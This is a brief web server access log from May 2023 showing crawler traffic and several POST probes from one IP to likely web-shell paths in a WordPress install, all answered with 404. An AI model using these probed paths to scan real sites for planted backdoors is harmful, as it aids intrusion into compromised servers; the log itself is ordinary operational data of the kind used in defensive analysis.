8.142.165.189 - - [05/May/2023:13:45:30 +0000] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (linux; u; android 9; zh-cn; v1816a build/pkq1.180819.001) applewebkit/537.36 (khtml, like gecko) version/4.0 chrome/57"
8.142.165.189 - - [05/May/2023:13:45:31 +0000] "GET /dist/images/mask/guide/cn/step1.jpg HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
8.142.165.189 - - [05/May/2023:13:45:32 +0000] "GET / HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (linux; u; android 9; zh-cn; v1816a build/pkq1.180819.001) applewebkit/537.36 (khtml, like gecko) version/4.0 chrome/57"
152.89.196.77 - - [05/May/2023:13:50:33 +0000] "POST /wp-content/plugins/wordpresss3cll-2/about.php?fuck=you HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:13:53:23 +0000] "POST /wp-content/wp-config-example.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
185.191.171.8 - - [05/May/2023:14:03:00 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [05/May/2023:14:03:00 +0000] "GET /?p=545 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.26 - - [05/May/2023:14:10:29 +0000] "GET /?p=1048 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [05/May/2023:14:13:33 +0000] "GET /?p=658 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:14:18:15 +0000] "POST /wp-content/upgrade/.83daa.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.191.171.19 - - [05/May/2023:14:21:44 +0000] "GET /?p=881 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
